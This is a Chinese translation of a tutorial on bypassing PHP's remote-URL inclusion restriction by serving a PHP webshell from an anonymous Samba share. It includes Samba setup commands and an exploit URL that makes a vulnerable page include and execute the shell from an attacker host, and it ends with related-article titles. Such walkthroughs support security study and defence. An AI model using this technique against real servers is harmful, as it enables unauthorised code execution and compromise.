译文声明

本文是翻译文章,文章原作者mannulinux,文章来源:mannulinux.org 
原文地址:http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

译文仅供参考,具体内容表达以及含义原文为准

简介

在这篇文章中,我分享一下PHP程序中的远程文件包含漏洞,它经常会在文件包含中被利用。尽管PHP环境已经配置了禁止从远程的HTTP/FTP URL包含文件,但我将分享如何绕过远程文件包含的限制。

PHP and SMB 共享文件访问权限

在PHP配置文件中,默认将allow_url_include设置为Off,来限制PHP去加载远程的HTTP/FTP文件,这也有效的防御了远程文件包含攻击。尽管PHP设置了allow_url_include和allow_url_fopen为Off,但是没有阻止下载SMB URL。

攻击场景

当存在漏洞的PHP应用程序从攻击者控制的SMB共享机器上下载PHP webshell时,SMB共享机器应该允许其访问该文件。攻击者应该设置SMB服务器可以匿名访问。因此,一旦存在漏洞的应用程序去从SMB共享机器上下载PHP webshell时,SMB服务器不用判断任何身份,存在漏洞的程序就可以包含这个webshell。

让我们开始,首先在PHP的配置文件php.ini中禁止 “allow_url_fopen” 和”allow_url_include”,稍后配置SMB服务器可以匿名访问。一旦SMB共享设置好,就可以实施攻击。

PHP 环境配置

存在漏洞的机器已经设置”allow_url_fopen”和”allow_url_include” 为Off,下面的截图显示当前的PHP版本为5.5.11。

在此之前,我们要去访问远程的HTTP服务器上的webshell时,确保PHP禁止了远程文件包含。

应用程序显示报错,当我从远程主机上测试包含PHP webshell时,远程文件包含没成功。

配置 SAMBA 服务器为匿名访问

使用以下命令去安装SAMBA服务器。

apt-get install samba

创建SMB 共享目录 (比如我的 /var/www/html/pub/)

mkdir /var/www/html/pub/

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

运行下面的命令来删除SAMBA 服务器的配置文件内容。

echo > /etc/samba/smb.conf

把下面的内容写在/etc/samba/smb.conf里面。

重启SAMBA服务器,让配置文件 /etc/samba/smb.conf生效。

一旦SAMBA 服务器重启成功,尝试去访问SMB共享文件,确认SAMBA 服务器没有设置访问权限。在我的测试中,SAMBA服务器的IP是192.168.0.3,在Windows 文件浏览中去访问SMB共享文件,如下图。

\192.168.0.3

在SMB共享中放置PHP webshell

真棒。SMB共享目录是可以访问的,ica文件是存在的。

在目录/var/www/html/pub中放置php webshell,这是SMB共享指令ica目录。

一旦在SMB共享目录中放置了PHP shell,使用windows 文件浏览访问SMB的共享目录ica.

\192.168.0.3ica

你会看到PHP shell在SMB 共享目录里面。我的是box.php

文件包含攻击

使用存在远程文件包含的PHP应用程序去访问这个SMB共享PHP shell的链接。

http://vulnerable_application/page.php?page=\192.168.0.3icabox.php

可以看到,存在PHP文件包含的应用程序从SMB’共享文件中获取web shell,并在机器上执行。我们已经绕过了限制并包含了托管在远程机器上的webshell。

php 创建目录_使用SMB绕过PHP远程文件包含限制相关推荐

  1. php远程文件包含攻击,利用SMB共享来绕过php远程文件包含的限制

    在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术.我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件. ...

  2. PHP 访问 samba,如何使用SMB共享绕过PHP远程文件包含限制进行安全测试

    原标题:如何使用SMB共享绕过PHP远程文件包含限制进行安全测试 *严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 概述 这篇文章中,我们将演示如何利用PHP应用程序中的远程文件包含(RFI) ...

  3. PHP远程文件包含(RFI)并绕过远程URL包含限制

    文章来源|MS08067 公众号粉丝投稿 本文作者:VastSky(Ms08067实验室粉丝) 前言 本文我们讲如何绕过远程URL包含限制.在PHP开发环境php.ini配置文里"allow ...

  4. php 怎么远程包含,利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...

    前言 文章讲诉了如何绕过远程URL包含限制.在PHP开发环境php.ini配置文件里",allow_url_include"为"off"的情况下,不允许PHP加 ...

  5. java 文件包含漏洞_远程文件包含漏洞(pikachu)

    漏洞介绍 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能.在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件. 比如 ...

  6. 18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

  7. index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

  8. test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)

    题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...

  9. php本地文件包含 截断,php远程文件包含截断问题

    今天在学习<白帽子讲web安全>一书是,提到一个php远程文件包含漏洞 可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令 服务器中有漏洞的页面代码为: #test.php #erro ...

最新文章

  1. Pdf怎么转换excel表格,职场人士必备技能
  2. CSP认证201503-1 图像旋转[C++题解]:模拟
  3. iOS对UIViewController生命周期和属性方法的解析
  4. 李洪强漫谈iOS开发[C语言-038]-if else if语句
  5. Centos7制作局域网http的yum源
  6. JBPM与设计模式之职责链模式
  7. mysql innodb和myisam_Mysql InnoDB和MyISAM的区别
  8. Remoting學習(三)----Reomoting 基楚知識
  9. python批量巡检服务器_python批量服务器巡检
  10. 云上的消费你真的算清楚了?
  11. LintCode—删除排序链表中的重复元素(112)
  12. java支付宝扫码支付,简单生成二维码方法
  13. win定时关机_windows如何设置定时关机?
  14. 数据分析神器Alteryx
  15. 有料科普 | 三峡大坝怎么过船,无用但能吹牛皮的知识又增加了
  16. 关于c基础实现简易计算器的代码(加减乘除)
  17. git 与github配置(老师详细版)
  18. 云上办公兴起,华为云桌面Workspace更靠谱
  19. 宽网多媒体发布系统产品简介
  20. 升级AndrOid4.3,三星S4升级Android 4.3系统后应用停止运行的解决办法图解

热门文章

  1. java中序列化与反序列化_Java中的序列化
  2. 使用带有OAuth的Spring Security保护资源
  3. 在Junit上使用Kafka
  4. JLBH示例4 – QuickFix vs ChronicleFix基准化
  5. jOOQ类型安全数据库查询教程
  6. java初学者指南_Java初学者指南
  7. Hamcrest Matchers的高级创建
  8. 介绍JBoss BPM Suite安装程序
  9. 我们正在破解JDBC,因此您不必
  10. ArrayList使用内存映射文件